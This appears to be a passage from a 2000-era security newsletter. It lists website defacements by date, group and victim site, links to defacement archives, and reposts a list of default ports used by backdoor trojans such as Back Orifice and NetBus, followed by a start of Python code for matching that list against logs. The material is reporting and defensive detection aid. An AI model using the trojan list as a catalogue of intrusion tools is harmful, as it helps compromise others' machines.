      [00.11.05] 2k [CyBeRpUnK]        MC  Professional Realty (www.berkeleycountyrealtor.com)
      [00.11.05] So [GForce Pakistan]      Pirchei Shoshanim (www.pirchei.co.il)
      [00.11.05] So [GForce Pakistan]      The Ultimate Shabbat Site (www.shabat.co.il)
      [00.11.05] So [GForce Pakistan]   C  World Peace Center (www.worldpeacecenter.org)
      [00.11.04] Lr [dodi]                 Cognifit (www.cognifit.co.il)
      [00.11.04] NT [Black Diamond]        Abentel Comércio e Representação Ltda (www.abentel.com.br)
      [00.11.04] Lr [CyBeRpUnK]        MC  Alphanet, S.A. de C.V. (www.virsem.com.mx)
      [00.11.04] Bf [Havoc Korp]           www.surfootball.com (www.surfootball.com)
      [00.11.04] NT [azndragon]            istituto agronomico mediterraneo (biopuglia.iamb.it)
      [00.11.04] Li [cid]                  Shenzhen SuperAsia Computer Technology Co.,Limited (www.csuu.com)
      [00.11.04] NT [crazy_bit]            www.telekabel.at (www.telekabel.at)
      [00.11.04] Li [Havoc Korp]           www.anarchy99.net (www.anarchy99.net)
      [00.11.04] NT [m0r0n/nightman]       Bayan Systems, Israel (www.bayan.co.il)
      [00.11.04] NT [lion&type_o]          Ministry of Agriculture, Iran (www.moa.or.ir)
      [00.11.04] Lr [DeTH]                 Brent Norman (www.ottawarcclub.com)
      [00.11.04] Li [Havoc Korp]           www.katakombe.com (www.katakombe.com)
      [00.11.04] NT [philer]           M   Efficient Web Solutions, LLC (www.efficientweb.com)
      [00.11.04] NT [m0r0n/nightman]       Automated Transaction System (www.caspit.co.il)
      [00.11.03] So [GForce Pakistan]   C  Shema Yisrael (www.shemayisrael.co.il)
      [00.11.03] So [GForce Pakistan]      Jen Communications (www.jen.co.il)
      [00.11.03] So [GForce Pakistan]      Health Infosystems Association, Israel (www.healthinfonet.co.il)
      [00.11.03] So [GForce Pakistan]      Visiting Israel Students Association (www.visa.org.il)
      [00.11.03] IR [GForce Pakistan]      Pf1 Systems Ltd. (www.pf1.co.il)
      [00.11.03] NT [rewben]               the hehe.com e-mail service (www.hehe.com)
      [00.11.03] NT [rewben]               Quantum Computer Services (www.myownemail.com)
      [00.11.03] Li [ipx]                  casemiro.castroalves.br (casemiro.castroalves.br)
      [00.11.03] NT [m0r0n]                Yizrael Valley College (Mihlelet Emek Yizrael) (www.yvc.ac.il)
      [00.11.03] So [GForce Pakistan]      Jewish Bible Association (www.jewishbible.org)
      [00.11.03] NT [predator]         MC  www.bos.cg.yu (www.bos.cg.yu)
      [00.11.02] NT [t3aM dANk]            AMT (shop.amt1st.com)
      [00.11.02] NT [bunny]             C  www.motormarkt.nl (www.motormarkt.nl)
      [00.11.02] NT [WeB Claws]        M   www.costruzionesiti.com (www.costruzionesiti.com)
      [00.11.02] 2K [Lord Choo3s]          FORIX - Formula One Results and Information eXplorer (www.forix.com)
      [00.11.02] So [Havoc Korp]           Ravenous Groove Productions (www.ethereality.com)
      [00.11.02] Lr [EVIL ANGELICA]        www.war247.com (www.war247.com)
      [00.11.02] Lr [CyBeRpUnK]        MC  SICA, S.A. DE C.V. (www.asofarma.com.mx)
      [00.11.02] Lr [Blitz]                SimTel Computers DBA (www.simtelcomputers.com)
      [00.11.02] Lr [DeTH]                 SCM Labs, Inc. (www.scmlabs.com)
      [00.11.02]    [Pakistan HC]          The American Israel Public Affairs Committee (www.aipac.org)
      [00.11.02] 2K [grape/squirl]         Arizona K12 Schools (ww2.chandler.k12.az.us)
      [00.11.02] Li []                     Robert Essery (www.whyamisick.com)
      [00.11.02] Sc [RSH]              M   Cybernet (www.cybernetinc.net)
      [00.11.02] NT [Anti Security]        Governo do Estado da Paraiba (ntiserv1.saude.pb.gov.br)
      [00.11.02] NT [m0r0n/nightman]       Shenkar College (www.shenkar.ac.il)
      [00.11.02] NT [rewben]           M   www.wannahaves.nl (www.wannahaves.nl)
      [00.11.02] NT [m0r0n/nightman]       Seminar Hakibutzim (www.smkb.ac.il)
      [00.11.01] So [Havoc Korp]           Royal Jordainian Web Site (www.rja.com.jo)
      [00.11.01] NT [TheKillers]           Marshall Informatica S/C Ltda (www.marshall.com.br)
      [00.11.01] Li [keoki]            M   Silverton Chamber of Commerce (www.silverton.org)
      [00.11.01] NT [azndragon]         C  CIS, University of Bologna (www.cis.unibo.it)
      [00.10.31] NT [McM4nus]              Banco Sudameris Brasil (Jarvis Entertainment Group (Total mirrors count..



      <GAPING HOLE IN COVERAGE GOES HERE>


       Date      OS Group/Person      AMCK Site                              2000
       ~~~~      ~~ ~~~~~~~~~~~~      ~~~~ ~~~~                            ~~~~~~~~
      
      [00.07.13] NT [team legacy]          O'Connor, Piper & Flynn (www.opf.com)
      [00.07.13] Li [SJ/bighawk]           STACK Systems Co. Ltd (www.stacksystems.co.jp)
      [00.07.13] Li [RSH]                  Apollo Dayton (www.apollodayton.com)
      [00.07.13] NT [ov3rh4zz4rd]          ActivityBoard.com (activityboard.com)
      [00.07.13] NT []                     Cox Fibernet (www.coxinet.net)
      [00.07.13] NT [digital insanity]     Maritime Telecommunications Network (www.mtnsat.com)
      [00.07.13] NT [team legacy]          Fordham University (www.fordham.edu)
      [00.07.12] NT [team legacy]          Virginia State University (www.vsu.edu)
      [00.07.12] NT [d00d00 kr3w]          Vaamonde Comunicaciones S.L. (www.bornet.edu)
      [00.07.12] NT [d00d00 kr3w]          Temple University (www.cspd.temple.edu)
      [00.07.12] NT [Papi/ICKIS]           Servicio de Comunicacion en Linea (www.obsession.com.mx)
      [00.07.12] NT [cyb3r fuck3rs]        Universidade de Sorocaba (www.uniso.br)
      [00.07.11] NT [x-s4nd3r]             Ejército de Guatemala (www.mindef.mil.gt)
      [00.07.11] NT [team legacy]          Boone County Public Library (www.bcpl.org)
      [00.07.11] So [Gforce Pakistan]      Fermi National Accelerator Laboratory (d0sunmsu1.fnal.gov)
      [00.07.11] Li [RLC]                  Bellevue Tech (www.bellevuetech.com)
      [00.07.11] So [Gforce Pakistan]      Fermi National Accelerator Laboratory 'cdsun2' Server (cdsun2.fnal.gov)
      [00.07.11] So [Gforce Pakistan]      Fermi National Accelerator Laboratory (fncduh.fnal.gov)
      [00.07.11] NT [HCI]                  University of Essex (www2.essex.ac.uk)
      [00.07.11] Li [SJ/bighawk]           Digital Media Interativa Comercio e Servicos (www.dmz.com.br)
      [00.07.11] NT []                     North Dakota Supreme Court Home Page (www.court.state.nd.us)
      [00.07.11] NT []                     Secretaria de Desarrollo Agropecuario y Pesquero (www.sedapver.gob.mx)
      [00.07.11] Ir [NuRaIn-ShAiKh]        Big Buddies (www.bigbuddies.com)
      [00.07.11] La [datagram]             Arisu Media Co,. Ltd (www.arisu.co.kr)
      [00.07.11] NT [Papi and ICKIS]       Servicio de Comunicación en Línea (www.prestige.com.mx)
      [00.07.10] NT [Crime Boys]           Gonzaga & Neves Ltda (www.atmnet.com.br)
      [00.07.10] NT [Crime Boys]           www.dgdrural.pt (www.dgdrural.pt)
      [00.07.10] So [GForce Pakistan]      Fermi National Accelerator Laboratory Cmstst Server (cmstst1.fnal.gov)
      [00.07.10] NT [SuBZeRo]              Campus Colima (www.col.itesm.mx)
      [00.07.10] Su [SuBZeRo]              Lazelle Street Land Company (www.sturgisrally.net)
      [00.07.10] Lu [Ben T]                Aegis (www.kjofol.org)
      [00.07.10] NT [do0do0 krew]          University of Texas at Brownsville and Texas Southmost College (www.utbtsc.edu)
      [00.07.10] BI [Team Holocaust]       Owl Kaufpark (www.owl-kaufpark.de)
      [00.07.10] NT [Team Holocaust]       Lance K Hofer (www.lkh.com)
      [00.07.10] NT [McM4nus]              Inst. Brasileiro da Qualidade e Produtividade (www.ibqppr.org.br)
      [00.07.10] BI [Team Holocaust]       AHG Handels-GmbH (www.ahg-art.com)
      [00.07.10] BI [Team Holocaust]   M   Dirk Gross (Elfenwald) (www.elfenwald.de)
      [00.07.10] BI [Team Holocaust]       DV Controlling (Hombergen) (www.hombergen.de)
      [00.07.10] NT [McM4nus]              Fundacao Estudar (www.estudar.org.br)
      [00.07.10] NT [Team Holocaust]       Covenant Health (www.covenanthealth.com)
      [00.07.10] NT [cyb3r fuck3rs]        Ass. Comunicacao Educativa Roquette Pinto (www.tvebrasil.com.br)
      [00.07.10] NT [cyb3r fuck3rs]        Ministerio Do Meio Ambiente (www2.mma.gov.br)
      [00.07.10] NT [cyb3r fuck3rs]        Ass. Comunicacao Educativa Roquette Pinto (www.radiomec.com.br)
      [00.07.09] NT [Anti Security]        Carolina Panthers (www.panthers.com)
      [00.07.09] NT [MADMAN]               Civil Aviation Safety Authority (www.casa.gov.au)
      [00.07.09] NT [id3nt]                Music (TW) (www.music.com.tw)
      [00.07.09] NT [Team Holocaust]       Lyric Opera Cleveland (www.lyricoperacleveland.org)
      [00.07.09] Lr [GForce Pakistan]      ISI Home Page (www.isical.ac.in)
      [00.07.09] Bf [Crime Boys]           Mario Gilberto Eichler Júnior (www.cybernegocios.com.br)
      [00.07.09] NT [Team Holocaust]       Victory Sports Marketing Corp (www.ad-network.com)
      [00.07.09] Li [Gforce Pakistan]      Luv India (www.luvindia.com)
      [00.07.09] NT [suPosix]              Industria De Produtos Alimenticios Cory Ltda (www.icekiss.com.br)
      [00.07.09] Li [Gforce Pakistan]  M   Bollywood Pages (www.bollywoodpages.com)
      [00.07.09] NT [Team Holocaust]       University Heights (www.universityheights.com)
      [00.07.09] NT [x-s4nd3r]             Parlamentsdienste Informatikdienst (www.parliament.ch)
      [00.07.09] NT [:0)]                  US Small Business Classroom (classroom.sba.gov)
      [00.07.09] NT [M3L40]                www.anticorrupcion.gov.co (www.anticorrupcion.gov.co)
      [00.07.09] NT [SuBZeRo]              Central Association of Southern Baptists (www.source1.org)
      [00.07.09] NT [Team Holocaust]       Web Service (www.web-service.com)
      [00.07.08] Li [Crime Boys]           Claudionor Ramos Advocacia E Consultoria Empresari (www.webmultas.com.br)
      [00.07.08] Ir [El Pulpo]             Prodima Alta Tecnologia (www.prodaltec.com)
      [00.07.08] NT [HC Pakistan]          Unsigned UK - Resource for UK Bands (www.unsigneduk.com)
      [00.07.08] Lr [Jfs]                  #2 Openhack -- eWEEK Hacking Challenge (www.openhack.com)
      [00.07.08] NT [HackersCrew]          MBK Media (www.mbkmedia.com)
      [00.07.08] So [Gforce Pakistan]      Convergent Systems (www.tems.com.sg)
      [00.07.08] So [Gforce Pakistan]      Mail Nexus (www.mailnexus.com)
      [00.07.08] Lr []                     I Wanna Know (www.iwannaknow.org)
      [00.07.08] Lr [kortex]               American Social Health Association (www.ashastd.org)
      [00.07.08] So [Gforce Pakistan]      Department of Health and Human Services (vault1.acf.dhhs.gov)
      [00.07.08] Bi [DHC]                  Rubber Snake (www.rubbersnake.com)
      [00.07.08] Lr [DHC]                  Cyber Golf (www.cybergolf.org)
      [00.07.08] So [artech]               Amevic (www.alzheimer-montpellier.org)
      [00.07.08] Lr [Napalm Death]         Happy Web! (www.happy-web.org)
      [00.07.08] NT [SuBZeRo]              Kumho Engineering company, Limited (www.kumhoeng.co.kr)
      [00.07.08] NT [SuBZeRo]              Electronic Display Industrial Research Association (www.edirak.or.kr)
      [00.07.08] NT [M3L4O]                Poli BR (www.poli.usp.br)
      [00.07.08] NT [M3L4O]                CRA Gov (CO) (www.cra.gov.co)
      [00.07.07] Lr [shitkingz]        M   Sebastian Fiebiger & Tobias Stober (www.fs-gbr.com)
      [00.07.07] NT []                     Cookbooks On/Line, Inc (www.cookbooksonline.com)
      [00.07.07] NT [McM4nus]              www.lapampa.gov.ar (www.lapampa.gov.ar)
      [00.07.07] Li [Gforce Pakistan]      Dev Sahai (www.agmoz.com)
      [00.07.07] Lr [GForce Pakistan]  M   Confluent Technologies Inc. (www.bittown.com)
      [00.07.07] NT [cyberpriest]          Boise County Internet Site (www.co.boise.id.us)
      [00.07.07] Li [Crime Boys]           Alamo Administradora e Corretora de Seguros LTDA (www.convergence.com.br)
      [00.07.07] Bi [Arogance]             Thomas Ecker (www.ecker-online.de)
      [00.07.07] Li [Crime Boys]           Allfarma Comercial Ltda (www.lrtur.com.br) 
      [00.07.07] NT [ANALISTA]             Idol Minds (www.idolminds.com)
      [00.07.07] NT [ANTI-ZONCKED]         COTASnet (www.cotas.com.bo)
      [00.07.07] NT [Crime Boys]       M   EDI Informatica LTDA (www.edinternet.com.br)
      [00.07.07] So [rootworm]             University of St Francis (www.stfrancis.edu)
      [00.07.07] NT [SuBZeRo]          M   Lady Furniture Co. Ltd (www.lady.co.kr)
      [00.07.07] 2k [SuBZeRo]              MEGAMEDICAL IND. CO., LTD. (www.megamedical.co.kr)
      [00.07.07] NT [M3L40]                Cinemark US (www.cinemark.com)
      [00.07.06] NT [McM4nus]              Municipalidad Ciudad de Cordoba (www.cordoba.gov.ar)
      [00.07.06] NT [McM4nus]              Sernah (AR) (www.sernah.gov.ar)
      [00.07.06] NT [McM4nus]              INTA Est. Exp. Agr. Saenz Peña (saenzpe.inta.gov.ar)
      [00.07.06] NT [ANALISTA]             Centro Federal de Educação Tecnológica do Parana (www.cefetpr-unedcp.br)
      [00.07.06] NT [ANALISTA]             Vianna & Zogheib LTDA (www.lpnet.com.br)
      [00.07.06] NT [McM4nus]              Municipalidad Ciudad de Cordoba (www.cordoba.gov.ar)
      [00.07.06] NT [M3L40]                Ministerio de Educación Nacional (www.mineducacion.gov.co)
      [00.07.06] NT [Urbanus-BR]           Bitcom (KR) (web.bitcom.co.kr)
      [00.07.06] Li [Crime Boys]           Allfarma Comercial Ltda (www.livretur.com.br)
      [00.07.06] Li [Crime Boys]           Cultura Ensinamentos Ltda (www.experimental.com.br)
      [00.07.06] NT [M3L40]                Corteconti (www.corteconti.it)
      [00.07.06] Lr [Lotus]                South Burlington School District (www.sburl.k12.vt.us)
      [00.07.06] NT [st3althy6 labs]       MSD of Martinsville (msdadmin.scican.net)
      [00.07.06] NT [hackforce2000]        Colorado School of Mines (oia.mines.edu)
      [00.07.06] Bi [team holocaust]       Boy Scout Troop 389 (www.troop389.com)
      [00.07.06] NT [hackforce2000]        Roanoke College (www.roanoke.edu)
      [00.07.06] NT [DrDoug]               Orlandia Equip. Tecnicos Ltda (www.orlatec.com.br)
      [00.07.06] Li [ ]                    Goudvisse (www.goudvisse.com)
      [00.07.06] Li [UPL]                  Auto Restoration Inc. (www.autorestorationinc.com) 
      [00.07.06] NT [x-s4nd3r]             Ministero dei Trasporti e della Navigazione (www.trasportinavigazione.it)
      [00.07.06] Bf [artech]               Northern California Fire Prevention Officers Association (www.norcal-fpo.org)
      [00.07.06] NT [votos locos]          Mississippi State Personnel Board Website (www.spb.state.ms.us)
      [00.07.06] So [GForce Pakistan]  M   Midwest Group (www.bwtc.net)
      [00.07.06] Lr [GForce Pakistan]      The Group 3 (www.thegroup3.com)
      [00.07.06] NT [hackforce]            Ministerul Finantelor - Centrul de Tehnologia Informatiei Financiare (www.mfinante.ro)
      [00.07.06] Lr [shitkingz]        M   Bradley Byrnes (www.icmcomputers.com)
      [00.07.06] NT [obzerve]              Checkmate Management Ltd (www.checkmate.com)
      [00.07.06] NT [Crime Boys]           Bulgarian Government (www.mjeli.government.bg)
      [00.07.06] NT [Crime Boys]           Spider Informatica LTDA (www.spider-df.com.br)
      [00.07.06] NT [Utreg]                McManus and Sons (www.mcmanus.com)
      [00.07.05] NT [M3L40]                Companhia De Informatica Do Parana - Celepar (celepar7.pr.gov.br)
      [00.07.05] Li [Crime Boys]           Jucelia Queiroz Amaral (www.stepcell.com.br)
      [00.07.05] NT [M3L40]                Centro Virtual de Estudos Políticos (cevep.ufmg.br)
      [00.07.05] Lr [GForce Pakistan]      networksetc.net (www.networksetc.net)
      [00.07.05] Lr [GForce Pakistan]      www.mckenzieonline.com (www.mckenzieonline.com)
      [00.07.05] NT [M3L40]                Kingdom of Saudi Arabia, minstery of information (www.spa.gov.sa)
      [00.07.05] Lr [GForce Pakistan]      NOAA, U.S. Department of Commerce (www.NauticalCharts.gov) 
      [00.07.05] NT [doodoo krew]          Spokane Police Department (www.spokanepolice.org)
      [00.07.05] NT [cyberpriest]          apiit.edu.my (apiit.edu.my)
      [00.07.05] C6 [Till]                 Employee Selection & Dev. Inc (www.employeeselect.com)  
      [00.07.05] NT [cdrz/liasons]         Retro Gallery (www.retro-online.com)
      [00.07.04] NT [fl3m]                 Shear Healthcare Resources, Inc. (www.shrmedquest.com)
      [00.07.04] So [ch1ck1e]              Nerp (www.nerp.org)
      [00.07.04] BI [O ANALISTA]           As Informatica Ltda (www.asinformaticabh.com.br)
      [00.07.04] NT [Crime Boys]           Verbatim Corporation (www.verbatim.com)
      [00.07.04] Lr [shitkingz]        M   Oak Lawn Condos (www.oaklawncondos.com)
      [00.07.04] Li [Crime Boys]           Marinho Assessoria Empresarial Ltda (www.marinhoassessoria.com.br)
      [00.07.04] Lr [mOs]                  Center for Advanced Technology (www.cat.gov.in)
      [00.07.04] NT [dobe and epic]        Austin Peay State University (www.apsu.edu)
      [00.07.04] Lr [shitkingz]            OMI, Inc (www.ofsnet.com)
      [00.07.04] NT [fish]                 Znet Tecnologia Aplicada (www.znet.com.br)
      [00.07.04] Lr [GForce Pakistan]  MC  Sony Entertainment Television Pvt. Ltd. (www.setindia.com)
      [00.07.04] Li [shitkingz]            Darcy Brown (www.scarletpimp.com)
      [00.07.04] NT [#bash krew]           Pennsylvania State System of Higher Education (www.sshechan.edu)
      [00.07.04] Lr [shitkingz]            Huzzah! (white-star.org)
      [00.07.04] NT [never]                New Jersey K12 Schools (www.peddie.k12.nj.us)
      [00.07.04] Lr [shitkingz]            Digital Products (www.digital-p.com)
      [00.07.04] NT [cyberpriest]          Canberra Edu (AU) (beth.canberra.edu.au)
      [00.07.04] NT [Jak/KP]            C  Editors Press Service (www.editorspress.com)
      [00.07.04] Lr [shitkingz]            Burney Van Stone (www.burneyvanstone.com)
      [00.07.04] Li [shitkingz]            The Eden Family (aaron.edenfamily.com)
      [00.07.04] Lr [shitkingz]            Xoltrex (www.xoltrex.com)
      [00.07.04] NT [rapeworm]             UltraNet Communications, Inc. (atserver.nh.ultranet.com)
      [00.07.04] Lr [shitkingz]            pstu.pi.net.ua (pstu.pi.net.ua)
      [00.07.04] NT [wds]                  Anqui Gov (CN) (www.anqiu.gov.cn)
      [00.07.04] NT [Crime Boys]           Facultad de Ciencias Económicas y de Administración (www.eco.unca.edu.ar)
      [00.07.04] NT [DeXeR]                Oklahoma City University (www.okcu.edu)
      [00.07.04] NT [obzerve]           C  Whittier Partners (www.whittier.com)
      [00.07.04] Li [The Itch]             Meredith Frederick Designs Ltd. (www.meredithfrederick.com)
      [00.07.04] NT [cyberpriest]          www.bhak-frk.asn-bgld.ac.at (www.bhak-frk.asn-bgld.ac.at)
      [00.07.04] NT [cyberpriest]          www.lycee.asn-wien.ac.at (www.lycee.asn-wien.ac.at)
      [00.07.04] NT [wds]                  web.cei.gov.cn (web.cei.gov.cn)
      [00.07.04] NT [wds]                  Kentucky K12 Schools (b-g.k12.ky.us)
      [00.07.04] Bf [Digital insanity]     Igor Zingerman (aps.imperfect.net)
      [00.07.04] NT [cdrz]                 Ontario Secondary School Students' Association (www.osssa.org)
      [00.07.04] NT [Octane]               Michael Smith (Puff Online) (www.puff-online.com)
      [00.07.03] NT [jak/kp]            C  Collectible Toys (www.collectibletoys.com)
      [00.07.03] NT [St3althy6 Labs]       Utah K12 Schools (www.daggett.k12.ut.us)
      [00.07.03] NT [Digit-0]              Lund Performance Solutions (www.lund.com)
      [00.07.03] So [GForce Pakistan]  M   Peng T. Ong (www.secondbeat.com)
      [00.07.03] NT [rapeworm]             NSPlanning Inc. (cue21.nsplanning.co.jp)
      [00.07.03] Li [Crime Boys]           Claudionor Ramos Advocacia E Consultoria Empresari (www.preferido.com.br)
      [00.07.03] 2k [jak]               C  The Sedlaks (www.sedlaks.com) 
      [00.07.03] So [al & mei]             Openhack -- eWEEK Emporium Catalog (www.openhack.com/cgi-bin/eweekorcl)
      [00.07.03] NT [Anti-Zoncked]         Electroid Company (www.electroid.com)
      [00.07.03] NT [Hacker Jak]        C  John McElroy (www.e3online.com)
      [00.07.03] 95 [obzerve]           C  IDEA QUEST UNLIMITED (www.ideaquestunlimited.com)
      [00.07.03] Li [l4m3r cr3wz]       C  Michael Adolph (www.god-crew.de)
      [00.07.03] NT [SuBZeRo]              www.ahone.co.kr (www.ahone.co.kr)
      [00.07.03] NT [cyberpriest]          Bundes Gymnasium Schwechat (www.bg-schwechat.asn-wien.ac.at)
      [00.07.03] NT [cyberpriest]          Gymnasium & Real-Gymnasium Wien 11 (www.grg11.asn-wien.ac.at)
      [00.07.03] NT [DeXeR]                DTS Software (www.dtssoftware.com)
      [00.07.03] NT [wds]                  California K12 Schools (lausdnet01.lausd.k12.ca.us)  
      [00.07.03] NT [rapeworm]             New Media BC (www.newmediabc.com)
      [00.07.03] Lr [acid]                 James Knowles (Digital IRC) (www.digital-irc.net)
      [00.07.02] NT [jak]               C  Ed Guy (www.edguy.com)
      [00.07.02] Li [Crime Boys]           Cunha Lanfermann Engenharia Ltda (www.projetosenegocios.com.br)
      [00.07.02] Li [datagram]             Dayton Internet Services, Inc (www.dayton.com)
      [00.07.02] NT [rapeworm]             Inglenet Software Corporation (www.merchantbridge.com)
      [00.07.02] NT [wds]                  California K12 Schools (nevco.k12.ca.us)
      [00.07.02] NT [rapeworm]             Icron Systems Inc (www.icron.com)
      [00.07.02] NT [rapeworm]             Inglenet Software Corp (iscnt2.inglenet.com)
      [00.07.02] NT [IZ Corp]              Medical School, UCLA (www.pathnet.medsch.ucla.edu)
      [00.07.02] NT [Crime Boys]           Pagina Oficial del M.G.A.P. (www.mgap.gub.uy)
      [00.07.02] Lm [rmImJ3c1PgFt2]        Root-bega (www.r00tabega.com)
      [00.07.02] NT [rapeworm]             Derived Systems, Inc (nt40-2.derived.com)
      [00.07.02] NT [Urbanus-BR]           University of Tartu, Estonia (ois.oppe.ut.ee)
      [00.07.02] NT [Urbanus-BR]           Israeli ORG (sdeyoav) (www.sdeyoav.org.il)
      [00.07.02] So [fluffi bunni]         Official #EnglishPub Home Page (www.englishpub.co.uk)
      [00.07.02] Li [SoLDaTeK]             West Yorkshire Broadcasting (www.magic828.co.uk)
      [00.07.02] Li [SuBZeRo]              Israeli Commercial (www.bookkeeper.co.il)
      [00.07.02] NT [Jak]               C  Sarasota Amateur Radio Association (www.saraclub.org)
      [00.07.02] 2k [Jak]                  The Steel Network (www.studplank.com)
      [00.07.01] NT [Cyb3r Fuck3rs]        Monumentos Historicos Nacionales (www.monumentos.gov.ar)  
      [00.07.01] NT [McM4nus]              Universitaet Zuerich (www.isb.unizh.ch)
      [00.07.01] Bi [DavidLetterman]       Grace House Ministries (www.gracehouse.org)
      [00.07.01] NT [kenton]               Rahal Schmitz Toyota (www.rahalschmitztoyota.com)
      [00.07.01] NT [System_Error_]        Edition Net (nt1.edition.net)
      [00.07.01] NT [ka0x]                 angelcity.wingnet.com.tw (angelcity.wingnet.com.tw)
      [00.07.01] Lb [#svun]                Superlearning Inc. (www.superlearning-inc.com)
      [00.07.01] NT [DeXeR]                United Nations Development Programme (www.unchina.org)
      [00.07.01] NT [DeXer]                Stillemans (www.stillemans.com)
      [00.07.01] Li [SuBZeRo]              www.ishyprint.co.il (www.ishyprint.co.il)
      [00.07.01] NT [DeXeR]                College of New Caledonia (www.cnc.bc.ca)
      [00.07.01] NT [DeXeR]                Association of South Central Oklahoma Governments (www.ascog.org)
      [00.07.01] NT [St3althy6 Labs]       North Dakota K12 Schools (www.cavalier.k12.nd.us)
      [00.07.01] Li [cyb3r fuck3rs]        White Force (www.whiteforce.com)
      [00.07.01] NT [Crime Boys]           All Ways Provedor de Acesso Internet (www.cult.com.br)          

     
      
      Hacker groups breakdown is available at Attrition.org
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Check out http://www.attrition.org/mirror/attrition/groups.html to see who
      you are up against. You can often gather intel from IRC, as many of these
      groups maintain a presence by having a channel with their group name as
      the channel name; others aren't so obvious but do exist.
      
      >Hacked Sites Start<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
      
      
      
      


      
      ========================================================================== 
      
      
      * Info supplied by the attrition.org mailing list.
      
      Cracked webpage archives (list from attrition)
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      http://www.attrition.org/
      http://www.hackernews.com/archive/crackarch.html
      http://www.freespeech.org/resistance/
      http://www.rewted.org/cracked/
      http://www.403-security.org/
      http://www.projectgamma.com/defaced/
      http://www.ironboxtech.com/articles/
      http://www.net-security.org/
      http://www.netrus.net/users/beard/pages/hacks/
      http://212.205.141.128/grhack/html/default_hacking.html
      http://194.226.45.195/hacked/hacked.html
      http://alldas.de/crkidx1.htm ** NEW URL *** >http://defaced.alldas.de
      http://www.turkeynews.net/Hacked
      http://www.flashback.se/hack/
      http://www.dutchthreat.org/
      http://www.onething.com/archive/
      http://www.2600.com/hacked_pages/
      http://hysteria.sk/hacked/
      http://erazor.vrnet.gr/
      
      
      
      
      Cracked sites listed oldest to most recent...does anyone read these? huh? do ya? heh.
      
 
        and more sites at the attrition cracked web sites mirror:

                     http://www.attrition.org/mirror/attrition/index.html 
 
       -------------------------------------------------------------------------
       
  A.0                              APPENDICES
       _________________________________________________________________________
       
      By: joakim.von.braun@risab.se 
      Source: PSS
       
      Common Trojan ports to watch for:
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
      After seeing several questions about traffic directed at ports as 31337 and
      12345 I've put together a list of all trojans known to me and the default
      ports they are using. Of course several of them could use any port, but I
      hope this list will maybe give you a clue of what might be going on.
      
      port     21 - Blade Runner, Doly Trojan, Fore, Invisible FTP, WebEx,
                    WinCrash
      port     23 - Tiny Telnet Server
      port     25 - Antigen, Email Password Sender, Haebu Coceda, Shtrilitz
                    Stealth, Terminator, WinPC, WinSpy
      port     31 - Hackers Paradise
      port     80 - Executor
      port    456 - Hackers Paradise
      port    555 - Ini-Killer, Phase Zero, Stealth Spy
      port    666 - Satanz Backdoor
      port   1001 - Silencer, WebEx
      port   1011 - Doly Trojan
      port   1170 - Psyber Stream Server, Voice
      port   1234 - Ultors Trojan
      port   1245 - VooDoo Doll
      port   1492 - FTP99CMP
      port   1600 - Shivka-Burka
      port   1807 - SpySender
      port   1981 - Shockrave
      port   1999 - BackDoor
      port   2001 - Trojan Cow
      port   2023 - Ripper
      port   2115 - Bugs
      port   2140 - Deep Throat, The Invasor
      port   2801 - Phineas Phucker
      port   3024 - WinCrash
      port   3129 - Masters Paradise
      port   3150 - Deep Throat, The Invasor
      port   3700 - Portal of Doom
      port   4092 - WinCrash
      port   4590 - ICQTrojan
      port   5000 - Sockets de Troie
      port   5001 - Sockets de Troie
      port   5321 - Firehotcker
      port   5400 - Blade Runner
      port   5401 - Blade Runner
      port   5402 - Blade Runner
      port   5569 - Robo-Hack
      port   5742 - WinCrash
      port   6670 - DeepThroat
      port   6771 - DeepThroat
      port   6969 - GateCrasher, Priority
      port   7000 - Remote Grab
      port   7300 - NetMonitor
      port   7301 - NetMonitor
      port   7306 - NetMonitor
      port   7307 - NetMonitor
      port   7308 - NetMonitor
      port   7789 - ICKiller
      port   9872 - Portal of Doom
      port   9873 - Portal of Doom
      port   9874 - Portal of Doom
      port   9875 - Portal of Doom
      port   9989 - iNi-Killer
      port  10067 - Portal of Doom
      port  10167 - Portal of Doom
      port  11000 - Senna Spy
      port  11223 - Progenic trojan
      port  12223 - Hack99 KeyLogger
      port  12345 - GabanBus, NetBus
      port  12346 - GabanBus, NetBus
      port  12361 - Whack-a-mole
      port  12362 - Whack-a-mole
      port  16969 - Priority
      port  20001 - Millennium
      port  20034 - NetBus 2 Pro
      port  21544 - GirlFriend
      port  22222 - Prosiak
      port  23456 - Evil FTP, Ugly FTP
      port  26274 - Delta
      port  31337 - Back Orifice
      port  31338 - Back Orifice, DeepBO
      port  31339 - NetSpy DK
      port  31666 - BOWhack
      port  33333 - Prosiak
      port  34324 - BigGluck, TN
      port  40412 - The Spy
      port  40421 - Masters Paradise
      port  40422 - Masters Paradise
      port  40423 - Masters Paradise
      port  40426 - Masters Paradise
      port  47262 - Delta
      port  50505 - Sockets de Troie
      port  50766 - Fore
      port  53001 - Remote Windows Shutdown
      port  61466 - Telecommando
      port  65000 - Devil
      
      You'll find the list on the following address:
      http://www.simovits.com/nyheter9902.html  (still in Swedish but it will be
      translated in the near future).
      
      To help anyone to detect trojan attacks, I'm planning to add information
      about the original names of the executables, their size, where they usually
      are hiding, and the names of any helpfiles they may use. I will also add
      tools or links to tools that may be of your assistance.
      
      Feel free to get back to me with any comments or suggestions. If you find
      new trojans I'll love to get my hands on them, but please mail me first, as
      I don't need more than one copy. If you have live experience of trojan
      attacks I'm interested to read about your findings.
      
      Joakim
      
      joakim.von.braun@risab.se
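
      A list like the one above is normally used by matching firewall or
      router logs against it. The Python below is an added example, not part
      of Joakim's post: it parses an excerpt of the list (wrapped entries
      included) and grades constructed log lines per source, treating ports
      21, 23, 25 and 80 as ambiguous because ordinary FTP, Telnet, SMTP and
      HTTP services use them. The log format, the grade names and every
      address in the sample are assumptions made for the example.

```python
import re
from collections import defaultdict

# Excerpt of the port list above, wrapped entries included.
PORT_LIST = """\
port     21 - Blade Runner, Doly Trojan, Fore, Invisible FTP, WebEx,
              WinCrash
port     25 - Antigen, Email Password Sender, Haebu Coceda, Shtrilitz
              Stealth, Terminator, WinPC, WinSpy
port     80 - Executor
port   6969 - GateCrasher, Priority
port  12345 - GabanBus, NetBus
port  20034 - NetBus 2 Pro
port  31337 - Back Orifice
port  31338 - Back Orifice, DeepBO
"""

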